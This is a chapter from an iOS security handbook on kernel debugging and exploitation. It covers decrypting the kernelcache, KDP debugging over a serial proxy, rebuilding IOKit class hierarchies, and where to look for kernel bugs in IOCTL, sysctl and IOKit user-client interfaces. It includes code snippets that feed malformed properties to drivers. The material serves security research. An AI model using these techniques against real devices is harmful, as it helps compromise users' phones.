Chapter 9

Kernel Debugging and Exploitation

So far, all the examples and exploit payloads within this book have concentrated on the iOS user space. However, user space code is very limited in what it can do, because of all the kernel-enforced security features. A compromise is therefore not complete, unless you start to look deeper and learn how to attack the kernel and penetrate the last line of defense. Within this chapter, you learn everything that enables you to find security vulnerabilities inside the kernel, to debug the problems you discover, and to turn vulnerabilities into working kernel exploits.

Kernel Structure

Before you can look at the iOS kernel and learn its structure or start to reverse it, you have to acquire a copy of the kernel in binary form. The actual binary you need is called kernelcache.release.*, and you can find it within iOS firmware IPSW archives. However, the kernel binary is in IMG3 file format, which means it is packed and also encrypted. To decrypt it, you need decryption keys and also a tool called xpwntool, which was forked by many people and is available in different versions, all over Github. You can find the original version of xpwntool at http://github.com/planetbeing/xpwntool.

The decryption key and AES initialization vector to decrypt an IMG3 file are stored within the file itself. They are not stored in plaintext, but encrypted with the device's GID key. The GID key is baked into the hardware of the devices and cannot be extracted. It is shared among devices of the same processor class. This means the iPhone 4, iPod4G, and iPad 1 share the same keys, but other devices like the iPhone 3G(S) or the iPad 2 and iPhone 4S have different keys. Therefore getting the real decryption key for a specific kernel is only possible by code running on a device of the same processor class. Also the GID key is disabled during the booting process before the kernel is started and therefore a bootrom, iBoot or ramdisk level exploit is required to determine the decryption key. This also means that at the time of writing this book there is no way to get the decryption keys for iPad 2 and iPhone 4S kernels, because there is no public low-level exploit for these devices. For all the other devices, this is no problem and the actual keys can be found on websites, like THEiPHONEWiKi at http://theiphonewiki.com/ or within the keys.plist file of redsn0w.

Note
Find code for this chapter at our book's website at www.wiley.com/go/ioshackershandbook.

With the key known, the decryption with xpwntool is pretty easy, and once decrypted the kernel's secrets can be lifted. The following example shows how to use xpwntool to decrypt a kernel:

$ xpwntool kernelcache.iPod4,1_4.3.5_8L1.packed
kernelcache.iPod4,1_4.3.5_8L1.decrypted -iv 48c4bac83f853a2308d1525a4a83ac37 -k
 4025a88dcb382c794a295ff9cfa32f26602c76497afc01f2c6843c510c9efcfc

The decryption reveals that the kernel binary is actually an ARM Mach-O executable. Aside from the base kernel, it also contains several segments that store all the loaded kernel extensions. Analyzing the strings within the binary further also reveals that the iOS kernel is actually compiled from a non-public tree of the XNU kernel source code. The structure of the iOS kernel is therefore identical to the structure of the Mac OS X kernel. This means that the public version of the XNU kernel helps whenever you try to analyze something in the base kernel, with the exception that the ARM architecture-dependent source code is not available. Aside from this, most of the things you know about Mac OS X do directly apply to iOS, with a few exceptions. You can therefore also find the three major components of XNU inside the iOS kernel. These are the bsd, the mach, and the IOKit components.

Kernel Debugging

When it comes to analyzing a kernel crash or developing a nontrivial kernel exploit, it is necessary to have some feedback about what is going on inside the kernel before a kernel panic occurs. Though binary analysis of the iOS kernel has proven that most of the debugging capabilities of the Mac OS X kernel are also compiled into iOS, it is not as easy to make use of them. This section goes into the debugging options available in iOS in more detail.

The first available debugging option is to deduce the internal kernel state from reading the paniclog that is generated by DumpPanic every time iOS reboots after a kernel panic. These paniclog files are simple text files that look a bit different depending on the type of kernel panic that occurred. Among the general information about the panic, it contains the current state of the CPU and, if possible, a short kernel backtrace. The system collects all the kernel paniclog files within the directory /Library/Logs/CrashReporter/Panics, which is accessible directly on jailbroken devices. For not jailbroken devices the com.apple.crashreportmover service of the lockdown daemon can be started through the MobileDevices framework, which will move the panic and crash logfiles to the directory /var/mobile/Library/Logs/CrashReporter. From there they can be retrieved via the com.apple.crashreportcopymobile AFC service. Every time iTunes is connected to a device with paniclog files on it, these services are used to copy the files to your Mac into the ∼/Library/Logs/CrashReporter/MobileDevice/<devicename>/Panics directory, from where they can be extracted easily.

Incident Identifier: 26FE1B21-A606-47A7-A382-4E268B94F19C
CrashReporter Key:   28cc8dca9c256b584f6cdf8fae0d263a3160f77d
Hardware Model:      iPod4,1
Date/Time:       2011-10-20 09:56:46.373 +0900
OS Version:      iPhone OS 4.3.5 (8L1)

panic(cpu 0 caller 0x80070098): sleh_abort: prefetch abort in kernel
mode:
fault_addr=0x41414140
r0: 0x0000000e  r1: 0xcd2dc000  r2: 0x00000118  r3: 0x41414141
r4: 0x41414141  r5: 0x41414141  r6: 0x41414141  r7: 0x41414141
r8: 0x41414141  r9: 0xc0b4c580 r10: 0x41414141 r11: 0x837cc244
12: 0xc0b4c580  sp: 0xcd2dbf84  lr: 0x8017484f  pc: 0x41414140
cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140

Debugger message: panic
OS version: 8L1
Kernel version: Darwin Kernel Version 11.0.0:
Sat Jul  9 00:59:43 PDT 2011;
root:xnu-1735.47∼1/RELEASE_ARM_S5L8930X
iBoot version: iBoot-1072.61
secure boot?: NO
Paniclog version: 1
Epoch Time:        sec       usec
  Boot    : 0x4e9f70d3 0x00000000
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x4e9f713d 0x000319ff

Task 0x80f07c60: 6227 pages, 79 threads: pid 0: kernel_task
Task 0x80f07a50: 185 pages, 3 threads: pid 1: launchd

The following paniclog sample describes a kernel panic in a special kernel that was booted. The panic occurred because the CPU tried to prefetch the next instructions from the address 0x41414140. This indicated that a stack-based buffer overflow overwrote the stored register values and the stored return address with a lot of A characters. The most important information within the paniclog is, however, the value of the LR register, because it contains the address of the instruction following the call to the overflowing function. In this case it allows you to find the code responsible for the overflow. However, this method of debugging is very limited and does not allow you to backtrace from where the code was called and determine or find what input was used to reach the offending code. Nevertheless, this method has been the primary method of debugging during kernel exploit development for all the public, pre iOS 4.3 vulnerabilities that have been used to jailbreak the devices. Only after the release of iOS 4.3 did kernel hackers succeed in using a more powerful debugging capability that is contained in the iOS kernel.

From binary analysis of the iOS kernelcache file, it has been known for a long time that the kernel debugging protocol KDP used for Mac OS X kernel debugging is also compiled into the iOS kernel. To activate it, the debug boot argument is required or a patched kernel must be booted. This has been possible for newer devices like the iPhone 4 ever since the release of the limera1n bootrom exploit, which was created by George Hotz. But due to broken kernel patches inside the public jailbreaks, initial attempts to use it failed and KDP was considered broken or disabled by Apple for iOS. However, after a while it was discovered that KDP was actually partially working and resulted only some of the features, in instant kernel crashes on boot. This information made it possible to track down the cause of the problems in the public kernel patches. Nowadays KDP is fully usable.

Initially, using KDP for iOS kernel debugging was something only members of the iOS jailbreak development teams were able to do, because they were the only ones able to boot arbitrary kernels, or to boot recent iOS versions with boot arguments. This first changed when the Chronic Dev Team released an open source version of their jailbreaking tool called syringe. With this code it was finally possible for everyone to boot different kernels or supply arbitrary boot arguments. Meanwhile, the iPhone Dev Team added this functionality into their redsn0w tool, which brought the functionality into the reach of the normal end user. Booting a kernel with activated KDP is now as easy as setting the debug boot argument with the –a option:

$ ./redsn0w  -j -a "debug=0x9"

The debug boot argument is actually a bit field that allows you to select or deselect certain KDP features. Table 9.1 lists the possible debugging features that you can use by toggling the appropriate bits. The supported bits are the same as those available for Mac OS X kernel debugging, and can be extracted from the kernel debugging documentation provided by Apple. However, certain debugging features simply do not work as expected or not at all. Options to create a kernel dump on panic or a nonmaskable interrupt (NMI) seem not to work due to the lack of an Ethernet device inside iPhones. Other options like breaking into the debugger on a NMI are supposed to work according to reports from Apple developers, but when you try them out, they only cause a panic followed by a reboot. This might be caused by another broken kernel patch. An NMI can be triggered on recent iDevices by pressing the power button and the volume down button at the same time for a few seconds.

Table 9.1 Debugging options selectable by the debug boot argument

Name Value Description
DB_HALT 0x01 This halts on boot and waits for a debugger to be attached.
DB_PRT 0x02 This causes kernel printf() statements to be sent to the console.
DB_NMI 0x04 This should halt on NMI.
DB_KPRT 0x08 This causes kernel kprintf() statements to be sent to the console.
DB_SLOG 0x20 This outputs diagnostic information to the system log.
DB_ARP 0x40 This allows the debugger to ARP and route for debugging across routers.
DB_LOG_PI_SCRN 0x100 This disables the graphical panic dialog.

Before you can use KDP on devices like the iPhone, you need to solve a few problems. KDP is a UDP protocol that can be used over Ethernet or via the serial interface, which are both ports you will not find in iPhones. However, the iPhone dock connector pin-out reveals that at least a serial port can be accessed through pins 12 and 13. Those can be used to build an iPhone dock-connector-to-serial adapter. You can find guidelines on this book's website (www.wiley.com/go/ioshackershandbook) explaining the complete dock connector pin-out, the required parts, and the construction process.

Once you have a dock-connector-to-serial adapter that connects your iPhone to a serial port, you run into another problem with the GNU debugger (GDB) and its KDP support. By default, GDB does not support KDP via serial, because even when serial is used, KDP still encapsulates every message inside a fake Ethernet and UDP packet. Because this problem affects not only iOS, but also Mac OS X kernel debugging, a solution already exists. In 2009 David Elliott created a tool called SerialKDPProxy that acts as a UDP to KDP over serial proxy. You should use a fork of the original tool that is available at Github https://github.com/stefanesser/serialKDPproxy, because the original tool does not work correctly in combination with Mac OS X Lion. The usage of this tool looks as follows:

$ ./SerialKDPProxy /dev/tty.<serial device name>
Opening /dev/tty.<serial device name>
Waiting for packets, pid=577
AppleH3CamIn: CPU time-base registers mapped at DART translated address:
0x0104502fmi_iop_set_config:192 cmd->reasetup_cyclesAppleH3CamIn:
:se4Driver:
pdleOpennit: driver advertises bootloader pages
AppleNANDLegacyFTL::_FILInit: driver advertises WhiteningData
eD1815PMU::start: DOWN0: 1050mV
tart: set VBUCK1_PRE1 to 950
AppleD1815PMU::start:A2 x 4 = 8,IIAppleNANDFTL::_publishServices:
Creating block device of 3939606 sectors of 8192 bytes
AppleNANDFTL::_publishServices: block device created, ready for work
AppleNANDFTL::setPowerStamappings

With this setup you can finally use GDB to connect to the iOS kernel waiting for a debugger. For best results, you should use the GDB binary provided within the iOS SDK, because it already comes with all the necessary ARM support. To let GDB speak through the SerialKDPProxy, configure it for a remote KDP target and tell it to attach to the localhost:

$ /Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch
armv7 GNU gdb 6.3.50-20050815 (Apple version gdb-1705)
(Fri Jul  1 10:53:44 UTC 2011)
This GDB was configured as
"--host=x86_64-apple-darwin --target=arm-apple-darwin"...
(gdb) target remote-kdp
(gdb) attach 127.0.0.1
Connected.

When you try to use the debugger at that point you see that the usability is very limited because GDB knows nothing about the actual target that is debugged. The backtrace feature does not work as expected and shows only one unknown entry. Also, the examine command incorrectly disassembles the code in ARM mode instead of Thumb mode:

(gdb) bt
#0  0x8006e110 in ?? ()
(gdb) x/5i $pc
0x8006e110:   undefined
0x8006e114:   rscle   r2, sp, r0, lsl #24
0x8006e118:   rscsle  r2, r9, r0, lsl #28
0x8006e11c:   ldrtmi  r4, [r1], -r0, asr #12
0x8006e120:   mrrc2   7, 15, pc, r4, cr15

To get a correct disassembly you have to force GDB to take the T bit in the CPSR register into account:

(gdb) x/6i $pc | $cpsr.t
0x8006e111:   undefined
0x8006e113:   b.n   0x8006e114
0x8006e115:   cmp   r4, #0
0x8006e117:   beq.n 0x8006e0f4
0x8006e119:   cmp   r6, #0
0x8006e11b:   beq.n 0x8006e110

Solving the broken backtrace problem is not as easy. To get a good backtrace you need to provide a symbolized kernel binary to GDB. Using the decrypted and unpacked kernelcache binary improves the situation, but it provides only a very small set of kernel symbols. A full set of kernel symbols is unavailable because Apple does not want anyone to debug iOS kernels. Therefore, it does not provide an iOS kernel debug kit to the public. However, the provided kernel debug kit for Mac OS X is still useful for iOS kernel debugging, because it allows you to use tools like zynamics BinDiff, which can port symbols even across CPU architectures. Alternatively, the idaiostoolkit provides a larger set of already ported kernel symbols for some iOS kernels.

These kernel symbols can be used as follows$
/Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch armv7
 kernelcache.symbolized
(gdb) target remote-kdp
(gdb) attach 127.0.0.1
Connected.
(gdb) bt
#0  0x8006e110 in sub_8006E03C ()
#1  0x8006e19e in Debugger ()
#2  0x8007402a in sub_80074020 ()
#3  0x8000a9a0 in kdp_set_ip_and_mac_addresses ()
#4  0x8000ac88 in sub_8000AC14 ()
#5  0x80020cf6 in sub_80020C98 ()
#6  0x8006c31c in sub_8006C300 ()

Now you can set breakpoints anywhere you like. This demonstration sets a breakpoint at the address 0x8017484A, which is the address of the call to copyin() that caused the stack-based buffer overflow in the paniclog demonstration. It is located inside the setgroups() system call:

(gdb) break *0x8017484a
Breakpoint 2 at 0x8017484a
(gdb) c
Continuing.

From there, you continue the execution until your code triggers the breakpoint. Because the setgroups() system call is triggered several times during boot, it is wise to activate this breakpoint only after the system has fully booted. When executing the malicious binary, you indeed end up at the breakpoint:

Breakpoint 2, 0x8017484a in sub_80174810 ()
(gdb) x/5i $pc | $cpsr.t
0x8017484b <sub_80174810+59>:     blx   0x8006cdf0 <copyin>
0x8017484f <sub_80174810+63>:     mov   r8, r0
0x80174851 <sub_80174810+65>:     cbnz   r0,
0x8017488c <sub_80174810+124>
0x80174853 <sub_80174810+67>:     mov   r0, r4
0x80174855 <sub_80174810+69>:     bl   0x80163fc0 <kauth_cred_proc_ref>

You can see that the breakpoint hit just before a call to the copyin() function, which is used inside the kernel to copy data from user space into kernel space. To understand what is going on, you can ask GDB for the parameters to copyin(), which are stored in the R0, R1, and R2 registers. In addition to that, you also ask for the stack-pointer SP and the saved stack-pointer in R7:

(gdb) i r r0 r1 r2 r7 sp
r0             0x2fdff850   803207248
r1             0xcd2cbf20   -852705504
r2             0x200 512
r7             0xcd2cbf7c   -852705412
sp             0xcd2cbf20   -852705504

This shows that the call to copyin() will copy 512 bytes from the user space stack into the kernel space stack. You can also see that copying 512 bytes will overflow the kernel stack buffer, because the saved stack-pointer in R7 is only 92 bytes above the buffer.

Kernel Extensions and IOKit Drivers

iOS has no kernel extension binaries in the filesystem. However, this does not mean that iOS does not support the concept of kernel extensions. Instead, all the required kernel extensions are prelinked into the kernelcache binary. This means special segments are added to the kernelcache binary called _PRELINK_TEXT, _PRELINK_INFO, and _PRELINK_STATE. These segments contain all the loaded kernel extensions and additional metadata about them. Working on or with the iOS kernel extensions therefore requires tools to handle the additional Mach-O binaries within the kernelcache. Earlier versions of HexRays' IDA Pro toolkit could not deal with these prelinked kernel extensions by default, and required help from an IDAPython script that searched for all the KEXT binaries inside the kernelcache and added additional segments to the IDA database. The output of this script is shown in Figure 9.1. With the release of version 6.2 of IDA, these files are now handled by default.

Figure 9.1 Kernel extensions found in the kernelcache

9.1

Reversing the IOKit Driver Object Tree

IOKit device drivers are special kinds of kernel extensions that use the IOKit API inside the iOS kernel and are implemented in a special limited version of C++. The implementation and definition of the IOKit are located in the iokit subdirectory of the XNU source code; and the C++ kernel implementation, including all the available base objects, is located in the libkern subdirectory.

Because most of the IOKit drivers are closed source components and do not come with source code, the usage of C++ makes things a bit more complicated from the reverse engineer's point of view. Object hierarchy has to be reconstructed from the binary, and determining the call-graph is more complicated for object-oriented programs. At the same time, the use of C++ introduces typical C++-only vulnerability classes into the kernel, which makes kernel exploitation more interesting.

To completely analyze the functionality of an IOKit driver, it is important to be able to reconstruct the C++ object hierarchy from the binary. Under normal circumstances, this would be a complicated task, but luckily IOKit driver binaries follow several simple rules when defining new IOKit objects:

  • IOKit objects always extend other IOKit objects or objects derived from the IOKit base objects.
  • For every IOKit object, a metaclass is registered that reveals the name of the object and a pointer to the parent.
  • The metaclass definition is directly followed by the class definition in the binary for iOS 4 and nearby it for iOS 5.

Because these rules are always followed, it is possible to reconstruct the whole IOKit object tree from the binary only. As a starting point, implement an IDAPython script that searches for all cross-references of the _ZN11OSMetaClassC2EPKcPKS_j symbol. This symbol is the constructor of the OSMetaClass object that is defined as follows:

   /*!
    * @function OSMetaClass
    * @param className  A C string naming the C++ class
    *                   that this OSMetaClass represents.
    * @param superclass The OSMetaClass object representing
the superclass
    *                   of this metaclass's class.
    * @param classSize  The allocation size of the represented C++
class.
    */
    OSMetaClass(const char * className,
        const OSMetaClass  * superclass,
        unsigned int         classSize);

From the definition, you can see that the OSMetaClass constructor is called with a string containing the name of the C++ class that the metaclass represents and with a pointer to the parent metaclass. At the binary level this looks like what is shown in Figure 9.2.

Figure 9.2 OSOrderedSet metaclass constructor

9.2

The OSMetaClass constructor is called at the binary level with four, instead of three, parameters. The first parameter that is passed in the R0 register contains a pointer to the metaclass currently being constructed. The other parameters — className, superclass, and classSize — are passed within the R1, R2, and R3 registers, respectively. To reconstruct the C++ class tree you have to start at the call to the OSMetaClass constructor and trace the values of the R1 and R2 registers backward from this position. In addition to that, you have to determine the current function and find all cross-references to it. There should be only one such cross-reference. From the cross-reference found, you can trace the value of the R0 register back to find a pointer to the new metaclass. (See Figure 9.3.)

Figure 9.3 Call of the OSOrderedSet metaclass constructor

9.3

Within the disassembly you can see that immediately after the constructor has been called, a pointer to the metaclass's method table is written to the object. This is useful because it allows you to find the method table responsible for an object. Within the kernelcache binary, the method table of the metaclass is always directly followed by the method table of the normal class. Although all of this demonstration occurs inside the iOS 4.3.5 kernel binary, the same applies to the iOS 5 kernel. The object initialization was changed a bit, and therefore in iOS 5 forward- and backtracking of register values is a bit more complicated.

With all this information, it is now a two-step process to rebuild the C++ class tree. In the first step, all calls to the OSMetaClass constructor are collected, including the four data elements className, metaclass, superclass, and methodtable. For a Python script, the best approach is to create a dictionary and use the metaclass as a key. This allows the second step to simply go through all the collected classes and construct the link to the parent class. From this data structure, it is a straightforward task to generate a graph in a .gml file format (for example) that can be visualized with free tools like yEd Graph Editor from yWorks, as shown in Figure 9.4. An IDAPython script that performs the whole tree reconstruction and outputs a graph file is part of the idaiostoolkit.

Figure 9.4 yEd showing a visual display of the IOKit class tree

9.4

In addition to being able to display a visual representation of the IOKit class hierarchy, the inheritance relationship between classes is very useful when reversing the functionality of an IOKit class. With this information it is possible to check the methods inside the method table of a class and determine if the same method is also used in the parent class. If the method is not found in the parent's method table, it has been overwritten in the child class. But in case it is found, it was just inherited from the parent. This allows you to distinguish specific functionality added by a child class.

When reversing IOKit drivers it comes in handy that, although the drivers themselves are closed source and come without symbols, the IOKit base classes are part of the main kernel and come with symbols and source code. And because these are C++ class methods, their symbols are in mangled form and reveal the method prototype even without access to the source code. This also means that walking up the inheritance tree, from a given method, allows you to determine if the overwritten method was one of the methods of an IOKit base class. In this case, the original symbol can be used to create a new symbol for the derived class, as shown in the following example from the method table of the IOFlashControllerUserClient class:

805584E8   DCD _ZN9IOService16allowPowerChangeEm+1
805584EC   DCD _ZN9IOService17cancelPowerChangeEm+1
805584F0   DCD _ZN9IOService15powerChangeDoneEm+1
805584F4   DCD sub_80552B24+1
805584F8  
DCD _ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1
805584FC  
DCD _ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1

You can then compare this to the method table of the parent class IOUserClient, which reveals the original symbol of the overwritten method:

80270120   DCD _ZN9IOService16allowPowerChangeEm+1
80270124   DCD _ZN9IOService17cancelPowerChangeEm+1
80270128   DCD _ZN9IOService15powerChangeDoneEm+1
8027012C   DCD
_ZN12IOUserClient14externalMethodEjP25IOExternalMethodArguments
           P24IOExternalMethodDispatchP8OSObjectPv+1
80270130   DCD
_ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1
80270134   DCD
_ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1

The overwritten method is called externalMethod, and after demangling the symbol further you get its full prototype:

externalMethod(unsigned int, IOExternalMethodArguments *,
IOExternalMethodDispatch *, OSObject *, void *)

With this knowledge you now know that the method at address 0x80552B24 most probably was called IOFlashControllerUserClient::externalMethod() in the original source code. This is good to know because this method provides methods that the user space code can call directly, and is therefore a starting point to find vulnerabilities.

Finding Vulnerabilities in Kernel Extensions

The most common vulnerabilities in kernel extensions across all operating systems are mistakes in the IOCTL handling subroutines of registered character or block devices. To find these vulnerabilities, it is therefore required to first locate all registered devices and then to locate their IOCTL handler. At the binary level this comes down to searching for calls to the functions cdevsw_add(), cdevsw_add_with_bdev(), and bdevsw_add(). Each of these functions adds a character device, a block device, or both. When a device is registered, a structure of type cdevsw or bdevsw that contains all the handlers for the specific device must be supplied. Both structures define an element called d_ioctl that is a function pointer to the IOCTL handler:

struct bdevsw {
   open_close_fcn_t *d_open;
   open_close_fcn_t *d_close;
   strategy_fcn_t   *d_strategy;
   ioctl_fcn_t      *d_ioctl;
   dump_fcn_t       *d_dump;
   psize_fcn_t      *d_psize;
   int              d_type;
};
struct cdevsw {
   open_close_fcn_t *d_open;
   open_close_fcn_t *d_close;
   read_write_fcn_t *d_read;
   read_write_fcn_t *d_write;
   ioctl_fcn_t      *d_ioctl;
   stop_fcn_t       *d_stop;
   reset_fcn_t      *d_reset;
   struct tty       **d_ttys;
   select_fcn_t     *d_select;
   mmap_fcn_t       *d_mmap;
   strategy_fcn_t   *d_strategy;
   void             *d_reserved_1;
   void             *d_reserved_2;
   int              d_type;
};

The idaiostoolkit contains an IDAPython script that scans the whole kernelcache binary for all registered character and block devices and outputs their IOCTL handlers. The handlers found can then be evaluated manually or attacked with an IOCTL fuzzer.

A second spot to look for vulnerabilities in kernel extensions is in the handlers for the network protocols they add. Each network protocol includes a number of interesting handlers that should be checked for vulnerabilities. The most commonly vulnerable code is located in the handlers called by the setsockopt() system call or that parse incoming network packets. To find these vulnerabilities you must first find all places in the code that register network protocols. At the binary level this comes down to calls of the function net_add_proto(). The first parameter to this function is a pointer to a protosw structure, which, among general information about the new network protocol, also contains function pointers to all the protocol-specific handlers. The protosw structure is defined as follows:

struct protosw {
   short pr_type;              /* socket type used for */
   struct domain *pr_domain;   /* domain protocol a member of */
   short pr_protocol;          /* protocol number */
   unsigned int pr_flags;      /* see below */
/* protocol-protocol hooks */
   void     (*pr_input)(struct mbuf *, int len);
                               /* input to protocol (from below) */
   int  (*pr_output)(struct mbuf *m, struct socket *so);
                               /* output to protocol (from above) */
   void (*pr_ctlinput)(int, struct sockaddr *, void *);
                               /* control input (from below) */
   int  (*pr_ctloutput)(struct socket *, struct sockopt *);
                               /* control output (from above) */
/* user-protocol hook */
   void *pr_ousrreq;
/* utility hooks */
   void (*pr_init)(void);      /* initialization hook */
   void (*pr_unused)(void);    /* placeholder - fasttimo is removed */
   void (*pr_slowtimo)(void);  /* slow timeout (500ms) */
   void (*pr_drain)(void);     /* flush any excess space possible */
   int  (*pr_sysctl)(int *, u_int, void *, size_t *, void *, size_t);
                               /* sysctl for protocol */
   struct pr_usrreqs *pr_usrreqs;   /* supersedes pr_usrreq() */
   int  (*pr_lock)(struct socket *so, int locktype, void *debug);
                               /* lock function for protocol */
   int  (*pr_unlock)(struct socket *so, int locktype, void *debug);
                               /* unlock for protocol */
   void *(*pr_getlock)(struct socket *so, int locktype);
   ...
};

The pr_input handler defined in this structure is called whenever a packet of the specific protocol is received and requires parsing. A vulnerability in this parser would allow remote exploitation of the kernel through malformed packets on the network. This kind of vulnerability is nearly extinct, and therefore it is very unlikely that you will find a problem in this code. However, one of the kernel extensions inside iOS might add a protocol that is not as well audited as the standard network protocols. The second field of interest is the pr_ctloutput handler. This handler gets called whenever the setsockopt() system call is called on a socket of this protocol type. The latest example of this vulnerability type is the kernel exploit that was used for untethering iOS 4.3 to iOS 4.3.3 jailbreaks. The vulnerability was an overflow in the integer-multiplication for memory allocation inside the pr_ctloutput handler of the ndrv (NetDriver) protocol.

The third common spot for vulnerabilities in kernel extensions is the sysctl interface. This interface is a mechanism for the kernel and for its extensions to provide read and write access to kernel state variables to processes with appropriate privilege levels. To register a new sysctl variable, the kernel function sysctl_register_oid() has to be called, with a sysctl_oid structure as parameter that defines the new kernel state variable. By searching the kernelcache for all cross-references to this function, it is possible to find all sysctl variables registered by kernel extensions, and these can be analyzed in depth. To understand the possible security problem arising from sysctl variables, you have to look into the definition of the sysctl_oid structure:

struct sysctl_oid {
   struct sysctl_oid_list  *oid_parent;
   SLIST_ENTRY(sysctl_oid) oid_link;
   int                     oid_number;
   int                     oid_kind;
   void                    *oid_arg1;
   int                     oid_arg2;
   const char              *oid_name;
   int                     (*oid_handler) SYSCTL_HANDLER_ARGS;
   const char              *oid_fmt;
   const char              *oid_descr;
   int                     oid_version;
   int                     oid_refcnt;
};

Ignoring the fact that a kernel extension could register a sysctl variable that provides access to some security-related kernel state to unprivileged processes, basically two different security problems can arise from sysctl variables. The first problem is related to the defined oid_handler. The kernel defines a number of predefined handlers for standard variable types like integers, strings, and opaque values. These handlers have existed for a long time and have been audited by several parties. It is very unlikely that passing a very long string to them through the sysctl() system call will result in a buffer overflow. The same cannot be said for handlers registered by closed-source kernel extensions for non-standard variable types. Therefore, it is a good idea to check all registered sysctl variables for non-standard handlers and audit each of them carefully.

A security problem in one of the variable handlers will usually lead to an immediately exploitable situation that is triggered by passing illegal values to the sysctl() system call. There is another danger arising from sysctl variables that you have to look for separately. Whenever there is a sysctl entry that provides write access to a kernel state variable, this opens up the possibility for user space code to directly attack code paths inside the kernel that use this variable. Such a problem could be, for example, an integer variable that influences the amount of memory that is allocated within the kernel. A user space process that can manipulate this value might be able to trigger an integer overflow inside a kernel-level memory allocation. Therefore, every kernel-level read access to a writable kernel state variable must be audited for the presence of security checks.

Finding Vulnerabilities in IOKit Drivers

The process of finding vulnerabilities inside IOKit drivers is basically the same as finding vulnerabilities in other kernel extensions or the kernel itself. However, the use of C++ inside IOKit drivers adds to the possible vulnerability classes that can be found. This includes a number of C++-only vulnerability classes:

  • Mismatched usage of new and delete, such as using delete[] to delete a single object
  • Object use after free vulnerabilities
  • Object type confusion vulnerabilities

In addition to these C++ typical vulnerabilities the attack surface of IOKit drivers is bigger, because they make use of the IOKit API, which defines interfaces that allow a user space driver to communicate with the kernel-level driver. To support this, an IOKit driver must implement a so-called user client, which is a class derived from IOUserClient, that enables a user space tool to connect to a device and communicate with its driver. The process of connecting to a device starts by looking it up in the IOKit registry. To do this, you first create a matching directory and then call one of the possible matching functions. Assume you want to look up the AppleRGBOUT device, because it was involved in one of the recent kernel exploits:

kern_return_t   kernResult;
io_iterator_t   iterator;
kernResult = IOServiceGetMatchingServices(kIOMasterPortDefault,
 IOServiceMatching("AppleRGBOUT"), &iterator);

On success, the iterator variable is filled with an io_iterator_t object that can be used to iterate over all the devices found. To get the first matching device, the function IOIteratorNext() is called once. In case of success a non-null object is returned.

io_service_t service;
service = IOIteratorNext(iterator)
if (service != IO_OBJECT_NULL) {
   ...

The user space tool can now call IOServiceOpen() to open the service and connect to the device:

io_connect_t connect;
kernResult = IOServiceOpen(service, mach_task_self(), 0, &connect);

All kernel exploits against the IOKit API have to start with code very similar to this. Because the majority of all IOKit drivers are closed source, and therefore most probably not as deeply audited as the open source parts of iOS, we strongly believe that a lot of vulnerabilities are still hidden inside IOKit drivers. For example, it is possible to crash the iOS kernel by simply trying to open the AppleBCMWLAN device as a non-root user. Once the user space tool is connected to a device, the connection can be used to communicate with the kernel driver in several different ways.

Attacking through Device Properties

The first possible route of attack is to change the properties associated with a device. You can do this by either setting one specific property with the IOConnectSetCFProperty() function or by setting all properties at once by calling IOConnectSetCFProperties(), which at the driver level results in a call to the method setProperty() or to the method setProperties():

int myInteger = 0x55667788;
CFNumberRef myNumber = CFNumberCreate(kCFAllocatorDefault,
kCFNumberIntType, &myInteger);
kernResult = IOConnectSetCFProperty(connect, CFSTR("myProp"), myNumber);

This code creates a number object from a normal int variable and then attempts to set a device property called myProp to this value. This attempt fails if the driver does not overwrite the setProperty() method, which is required to allow setting a property. The kernel driver might also decide to let it fail, because it does not know a property of this name, or because it expects a different object type. For example, the property could be a string instead of a number. It is up to the driver whether to check for this and not accept invalid object types, so you must audit the setProperty() method to evaluate how invalid properties or object types are handled. A similar problem will arise if you change the code to set multiple properties at the same time:

int myInteger = 0x55667788;
CFNumberRef myNumber = CFNumberCreate(kCFAllocatorDefault,
kCFNumberIntType, &myInteger);
kernResult = IOConnectSetCFProperties(connect, myNumber);

This version of the code passes the number object through the function IOConnectSetCFProperties(), which finally calls the setProperties() method of the driver object. The problem is that your code sends a number object, while the method expects a dictionary object. This is, however, not enforced and therefore it is up to the implementation of the kernel driver to ensure that it is dealing with a dictionary object before any attempt to enumerate the dictionary's content. And even if a dictionary object is supplied, there is still the possibility that one of the contained properties is of an unexpected type.

Setting properties is not the only way to communicate with a kernel driver. The IOUserClient interface defines more direct communication methods like direct memory mapping and external traps and methods. Though it might be possible to find vulnerabilities exposed through direct memory mapping, we don't cover these within this chapter. The curious reader can, however, take a look into the IOKit drivers that overwrite the method clientMemoryForType() in their user client implementation and use it as a starting point for further investigations. This includes the classes IOAccessoryPortUserClient, AppleMultitouchSPIUserClient, and IOAudio2DeviceUserClient.

Attacking through External Traps and Methods

A more promising place to find vulnerabilities in is the external traps and methods a user client can define. These are traps and methods that can be called directly from user space to make the driver do some action and return the result. Many of the IOKit drivers offer these kinds of services to user space clients. The difference between traps and methods is that external traps are part of the mach trap system and external methods are more like pure IOKit functionality. An IOKit driver can choose to offer both, one, or none of these external interfaces.

User space code can call external traps defined within IOKit driver by index, through the iokit_user_client_trap() mach trap, with up to six parameters:

kernResult = iokit_user_client_trap(connect, index, p1, p2, 0, 0, 0, 0);

The kernel-level user client implementation can offer these traps by overwriting the IOUserClient methods getExternalTrapForIndex() and getTargetAndTrapForIndex(). This creates the potential for two different kinds of security problems. First, the numerical index of the trap called could be trusted within the driver and used as an index into a lookup table. If the lookup is using an unchecked index, an attacker might adjust the index in a way that it looks up the trap function pointer from an attacker-defined memory page, which would lead to immediate kernel code execution. The second possibility is that the offered external traps have security problems themselves, because they put too much trust in the trap arguments. Therefore, the trap handler code should be audited for both kinds of security problems.

Very similar and related, but a bit more complicated, are external methods. External methods can be called through various functions of the IOKit API, depending on the number and type of input and output parameters that you want to work with. Depending on which version of the IOKit API you are using, there are different API functions available to call the methods. However, we will just concentrate on the most general way to call an external method within modern code. It is through the IOConnectCallMethod() function:

kern_return_t
IOConnectCallMethod(
   mach_port_t    connection,         // In
   uint32_t       selector,           // In
   const uint64_t *input,             // In
   uint32_t       inputCnt,           // In
   const void     *inputStruct,       // In
   size_t         inputStructCnt,     // In
   uint64_t       *output,            // Out
